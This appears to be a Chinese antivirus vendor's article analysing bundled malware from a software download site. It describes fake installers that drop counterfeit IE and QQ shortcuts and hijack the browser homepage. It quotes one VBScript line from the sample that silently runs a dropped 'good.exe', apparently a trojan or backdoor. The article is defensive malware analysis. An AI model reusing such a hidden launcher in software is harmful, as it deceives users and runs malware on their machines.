揭秘下载网站的欺诈伎俩

    我们来揭晓这个StartPage.XX系列到底是一种什么样的病毒，下载站诱使访问者下载的这些“软件”里到底有什么玄机呢？

    上图是从某知名下载站下载一款IE辅助工具获得的三个文件，其中最显眼的文件当然是“先运行该文件.exe”,出于对这类下载站点的信任，大多数用户恐怕会毫不犹豫的点击它。我们看看点击它会发生什么。

　　如上图，双击该文件，那款IE辅助工具无提示安装，同时桌面上释放“源码下载”，“软件下载”两个快捷方式，其中“软件下载”是指向该下载站。如果说这种建一个快捷方式宣传其站点是一种性质还比较“善良”广告，那我们接下来介绍的这类“软件”就比较凶狠了。

　　如图，这同样是从该下载站所下载的某网络电视播放软件，在该站同类软件下载数量排行榜中高居第二。左上角的123.exe即是所下载的软件安装包，右边的文件是从该安装包里解压出来的文件，安装包将会把这些文件释放到用户电脑中。经常安装各类软件的网民恐怕已经看出问题的端倪了，这些文件中除去ico图标文件外，有大量的快捷方式，vbs脚本，而正常软件安装包所释放的文件大部分应该是exe和dll文件。

　　这个“安装包”在桌面上释放上图我们所列出的快捷方式，如上图所示，真正的IE桌面项已经被删除，桌面上4个与IE很相似的快捷项均是“安装包”所释放，与假qq快捷方式类似，这些假IE指向的是system32目录下的URL链接。 

　　假qq快捷方式指向的systemqq.vbs中代码：

　　createobject(”wscript.shell”).run ”C:\WINDOWS\system32\good.exe”,0

　　即运行good.exe，而这个good.exe往往就是真正的安全威胁，可能是某类盗号木马或者恶意后门。

　　假IE指向system32\Internet Exporer.Url链接，再看看它是干嘛的。

　　看到这里，一些常为IE主页被锁定而烦恼的朋友一定会明白了，为什么自己每次打开IE，主页却不是设置的那个了吧。是的，每当你点击桌面上那些假的IE时，就会自动打开如上图中这类网站。这些网站可能只是普通的导航类站点，但也很有可能被精心设计过，存在挂马、欺诈等威胁的恶意站点。访问量越大，这类站点所获取的收益就越有保障。作者们因而在各大下载站点大力”推广”.

　　金山毒霸将对这类下载中存在的安全威胁持续关注。同时提醒用户，下载软件时选择信誉有保障的大站点，用杀毒软件扫描所下载文件，是对抗这类威胁最有效的办法。已中招的用户可以通过金山急救箱来修复被篡改的主页，金山急救箱针对这类威胁提供了专用解决方案。